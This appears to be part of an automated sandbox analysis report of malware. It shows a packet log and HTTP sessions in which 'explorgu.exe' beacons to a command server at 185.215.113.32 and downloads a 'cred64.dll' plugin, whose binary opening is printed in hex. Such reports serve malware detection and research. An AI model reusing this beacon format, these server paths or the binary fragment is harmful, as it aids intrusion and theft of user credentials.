                                                                                            Mar 28, 2024 20:04:22.796437025 CET8049842185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:22.796518087 CET4984180192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:22.796555042 CET4984280192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:22.796981096 CET4984280192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.044814110 CET8049842185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:23.044841051 CET8049842185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:23.044905901 CET4984280192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.048537970 CET4984280192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.048851013 CET4984380192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.175224066 CET4984480192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.286587000 CET8049843185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:23.287071943 CET4984380192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.294879913 CET8049842185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:23.294961929 CET4984280192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.421494961 CET8049844185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:23.421560049 CET4984480192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.422112942 CET4984480192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.668317080 CET8049844185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:23.668888092 CET8049844185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:23.668930054 CET4984480192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.672296047 CET4984480192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.672662020 CET4984580192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.917613983 CET8049845185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:23.917788982 CET4984580192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.918071985 CET4984580192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:23.918292046 CET8049844185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:23.918421984 CET4984480192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:24.162924051 CET8049845185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:24.167860031 CET8049845185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:24.167959929 CET4984580192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:24.285767078 CET4984580192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:24.286077023 CET4984680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:24.524724007 CET8049846185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:24.524821997 CET4984680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:24.525120974 CET4984680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:24.530973911 CET8049845185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:24.531065941 CET4984580192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:24.763431072 CET8049846185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:24.764106035 CET8049846185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:24.764159918 CET4984680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:24.766772985 CET4984680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:24.767091990 CET4984780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:25.005008936 CET8049846185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:25.005083084 CET4984680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:25.013484001 CET8049847185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:25.013561010 CET4984780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:25.028331995 CET4984780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:25.276556015 CET8049847185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:25.280544043 CET8049847185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:25.280667067 CET4984780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:25.396018028 CET4984780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:25.396365881 CET4984880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:25.642122030 CET8049847185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:25.642179012 CET4984780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:25.642725945 CET8049848185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:25.642808914 CET4984880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:25.643217087 CET4984880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:25.889348030 CET8049848185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:25.889813900 CET8049848185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:25.890125990 CET4984880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:25.893058062 CET4984880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:25.893744946 CET4984980192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:26.140253067 CET8049848185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:26.140355110 CET4984880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:26.141006947 CET8049849185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:26.141098022 CET4984980192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:26.141411066 CET4984980192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:26.387397051 CET8049849185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:26.392553091 CET8049849185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:26.392625093 CET4984980192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:26.502856016 CET4984980192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:26.503134012 CET4985080192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:26.749449968 CET8049849185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:26.749475002 CET8049850185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:26.749574900 CET4984980192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:26.749598026 CET4985080192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:26.768306971 CET4985080192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:27.014628887 CET8049850185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:27.015290976 CET8049850185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:27.015430927 CET4985080192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:27.451086044 CET4985080192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:27.452414989 CET4985180192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:27.696909904 CET8049850185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:27.696990013 CET4985080192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:27.698502064 CET8049851185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:27.698807955 CET4985180192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:27.701234102 CET4985180192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:27.947155952 CET8049851185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:27.950536966 CET8049851185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:27.953211069 CET4985180192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:29.734998941 CET4985180192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:29.736654997 CET4985280192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:29.975526094 CET8049852185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:29.975593090 CET4985280192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:29.981687069 CET8049851185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:29.981736898 CET4985180192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:29.990067959 CET4985280192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:30.228904009 CET8049852185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:30.229198933 CET8049852185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:30.229243994 CET4985280192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:30.248148918 CET4985280192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:30.249336958 CET4985380192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:30.487428904 CET8049852185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:30.487477064 CET4985280192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:30.494729996 CET8049853185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:30.494805098 CET4985380192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:30.496388912 CET4985380192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:30.741106033 CET8049853185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:30.744712114 CET8049853185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:30.744791985 CET4985380192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:30.862353086 CET4985380192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:30.862751961 CET4985480192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:31.107258081 CET8049853185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:31.107330084 CET4985380192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:31.107623100 CET8049854185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:31.107692003 CET4985480192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:31.108074903 CET4985480192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:31.352960110 CET8049854185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:31.353399992 CET8049854185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:31.353455067 CET4985480192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:31.356003046 CET4985480192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:31.356287956 CET4985580192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:31.594552994 CET8049855185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:31.594677925 CET4985580192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:31.595195055 CET4985580192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:31.601053953 CET8049854185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:31.601289988 CET4985480192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:31.833102942 CET8049855185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:31.837445021 CET8049855185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:31.838046074 CET4985580192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:31.959255934 CET4985580192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:31.960210085 CET4985680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:32.197191000 CET8049855185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:32.197263002 CET4985580192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:32.206641912 CET8049856185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:32.206824064 CET4985680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:32.208204031 CET4985680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:32.454540014 CET8049856185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:32.455002069 CET8049856185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:32.455091953 CET4985680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:32.466629028 CET4985680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:32.467452049 CET4985780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:32.712199926 CET8049857185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:32.712299109 CET4985780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:32.712693930 CET4985780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:32.712734938 CET8049856185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:32.712924957 CET4985680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:32.957778931 CET8049857185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:32.962754011 CET8049857185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:32.962807894 CET4985780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:33.080713034 CET4985780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:33.081053019 CET4985880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:33.319284916 CET8049858185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:33.319395065 CET4985880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:33.319751024 CET4985880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:33.325792074 CET8049857185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:33.325869083 CET4985780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:33.559196949 CET8049858185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:33.559474945 CET8049858185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:33.559602976 CET4985880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:33.567899942 CET4985880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:33.568192959 CET4985980192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:33.805942059 CET8049858185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:33.806004047 CET4985880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:33.807950974 CET8049859185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:33.808269978 CET4985980192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:33.808773994 CET4985980192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:04:34.047555923 CET8049859185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:34.050784111 CET8049859185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:04:34.050836086 CET4985980192.168.2.4185.215.113.32

                                                                                            HTTP Request Dependency Graph

                                                                                            • 185.215.113.32

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449737185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:03.166033983 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:03.414588928 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:03.416089058 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:03.667124033 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.449736185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:03.166183949 CET65OUTGET /yandex/Plugins/cred64.dll HTTP/1.1
                                                                                            Host: 185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.414609909 CET1286INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:03 GMT
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Length: 1285632
                                                                                            Last-Modified: Sun, 04 Feb 2024 16:00:19 GMT
                                                                                            Connection: keep-alive
                                                                                            ETag: "65bfb493-139e00"
                                                                                            Accept-Ranges: bytes
                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 83 b2 bf 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$^^^_^_^_2^W_^W_^W_^_^^C^_^_^X^^_^Rich^PEde" RhP` Xx `(0p .text `.rdata@@.dataLD@.pdata(`@@_RDATA@@.rsrc @@.reloc0@B
                                                                                            Mar 28, 2024 20:03:03.414633036 CET1286INData Raw: 00 00 00 00 00 00 00 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 97 6e 11 00 48 8d 0d e0 bb 12 00 e8 d3 20 0c 00 48 8d 0d 0c 85 0f 00 48 83 c4 28 e9 cf f2 0c 00 cc cc cc 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 8f 6e 11 00 48 8d 0d b0 c2 12 00 e8 a3 20
                                                                                            Data Ascii: H(A HnH HH(H(A HnH HLH(H(AHnHs HH(oH(A H_nHC HH(?H(AHWnH HH(
                                                                                            Mar 28, 2024 20:03:03.414654970 CET1286INData Raw: 0d 8c 8b 0f 00 48 83 c4 28 e9 ef ed 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 4f 6c 11 00 48 8d 0d b0 b5 12 00 e8 c3 1b 0c 00 48 8d 0d cc 8b 0f 00 48 83 c4 28 e9 bf ed 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 2f 6c 11 00
                                                                                            Data Ascii: H(H(AHOlHHH(H(AH/lHHH(H(A(HlHcHLH(_H(AHlH3HH(/H(AHkHH
                                                                                            Mar 28, 2024 20:03:03.414727926 CET1286INData Raw: bb 12 00 e8 e3 16 0c 00 48 8d 0d 4c 92 0f 00 48 83 c4 28 e9 df e8 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 57 69 11 00 48 8d 0d a0 b7 12 00 e8 b3 16 0c 00 48 8d 0d 8c 92 0f 00 48 83 c4 28 e9 af e8 0c 00 cc cc cc 48 83 ec 28 41 b8 04
                                                                                            Data Ascii: HLH(H(AHWiHHH(H(AH7iHHH(H(AHiHSHH(OH(AHhH#HLH(H(AHhH`
                                                                                            Mar 28, 2024 20:03:03.414743900 CET1286INData Raw: 8d 15 ef 67 11 00 48 8d 0d 20 ae 12 00 e8 d3 11 0c 00 48 8d 0d 0c 99 0f 00 48 83 c4 28 e9 cf e3 0c 00 cc cc cc 48 83 ec 28 41 b8 34 00 00 00 48 8d 15 cf 67 11 00 48 8d 0d b0 b8 12 00 e8 a3 11 0c 00 48 8d 0d 4c 99 0f 00 48 83 c4 28 e9 9f e3 0c 00
                                                                                            Data Ascii: gH HH(H(A4HgHHLH(H(A(HgHsHH(oH(AHgHCHH(?H(A4HgHHH(H(A(H
                                                                                            Mar 28, 2024 20:03:03.414757967 CET1286INData Raw: c7 40 60 0f 00 00 00 88 50 48 48 89 50 78 48 c7 80 80 00 00 00 0f 00 00 00 88 50 68 48 89 90 98 00 00 00 48 c7 80 a0 00 00 00 0f 00 00 00 88 90 88 00 00 00 48 89 90 b8 00 00 00 48 c7 80 c0 00 00 00 0f 00 00 00 88 90 a8 00 00 00 48 89 90 d8 00 00
                                                                                            Data Ascii: @`PHHPxHPhHHHHHHHHHH H8H@(HXH`HHxHhHH
                                                                                            Mar 28, 2024 20:03:03.414827108 CET1286INData Raw: 88 90 a8 00 00 00 48 89 90 d8 00 00 00 48 c7 80 e0 00 00 00 0f 00 00 00 88 90 c8 00 00 00 48 89 90 f8 00 00 00 48 c7 80 00 01 00 00 0f 00 00 00 88 90 e8 00 00 00 48 89 90 18 01 00 00 48 c7 80 20 01 00 00 0f 00 00 00 88 90 08 01 00 00 48 89 90 38
                                                                                            Data Ascii: HHHHHH H8H@(HXH`HHxHhHHHHHHHH
                                                                                            Mar 28, 2024 20:03:03.414840937 CET1286INData Raw: 00 00 88 90 08 01 00 00 48 89 90 38 01 00 00 48 c7 80 40 01 00 00 0f 00 00 00 88 90 28 01 00 00 48 89 90 58 01 00 00 48 c7 80 60 01 00 00 0f 00 00 00 88 90 48 01 00 00 48 89 90 78 01 00 00 48 c7 80 80 01 00 00 0f 00 00 00 88 90 68 01 00 00 48 89
                                                                                            Data Ascii: H8H@(HXH`HHxHhHHHHHHHHHH H8H@(HXH`
                                                                                            Mar 28, 2024 20:03:03.414879084 CET1286INData Raw: f9 b4 12 00 e8 f0 dc 0c 00 48 8d 0d c9 9a 0f 00 48 83 c4 28 e9 c0 cf 0c 00 48 8d 0d c5 9a 0f 00 e9 b4 cf 0c 00 48 8d 0d 15 9b 0f 00 e9 a8 cf 0c 00 48 8d 0d 49 9b 0f 00 e9 9c cf 0c 00 48 83 ec 28 48 8d 0d 75 b8 12 00 e8 ac dc 0c 00 48 8d 0d 75 9b
                                                                                            Data Ascii: HH(HHHIH(HuHuH(|H\$Hl$Ht$ WAVHLTAL5GL@AAt'AB0TB82TuIIEAExAB0TAB0T+uH
                                                                                            Mar 28, 2024 20:03:03.414901972 CET1286INData Raw: 44 24 30 48 8b 4e 60 ff 15 2a 76 12 00 01 44 24 30 48 8b 7e 40 48 85 ff 74 14 48 8b 57 10 48 8b cb e8 41 b8 06 00 48 8b 3f 48 85 ff 75 ec 48 8b 7e 10 48 85 ff 74 14 48 8b 57 10 48 8b cb e8 74 38 04 00 48 8b 3f 48 85 ff 75 ec 8b 43 28 41 ff c7 48
                                                                                            Data Ascii: D$0HN`*vD$0H~@HtHWHAH?HuH~HtHWHt8H?HuC(AH D;IHl$ L A~0IHC HL0HtD8qtiuUH ;{(|HL$(D$0DuH{HL$0H AD$0HtgfDHHE^L9 tHH1
                                                                                            Mar 28, 2024 20:03:03.660882950 CET1286INData Raw: 00 0f b6 43 01 48 8d 5b 01 42 f6 04 30 01 75 f1 84 c0 40 0f 95 c7 85 ff 75 0d 39 7e 1c 0f 95 c0 88 46 2b 33 c0 eb 05 b8 01 00 00 00 48 8b 4c 24 78 48 33 cc e8 28 bf 0c 00 4c 8d 9c 24 80 00 00 00 49 8b 5b 20 49 8b 6b 30 49 8b e3 41 5e 5f 5e c3 48
                                                                                            Data Ascii: CH[B0u@u9~F+3HL$xH3(L$I[ Ik0IA^_^Hy*L.y(H$tADIYAAD@AC*AAIDOQADAADhAAOiQQDAADAlDiAA


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
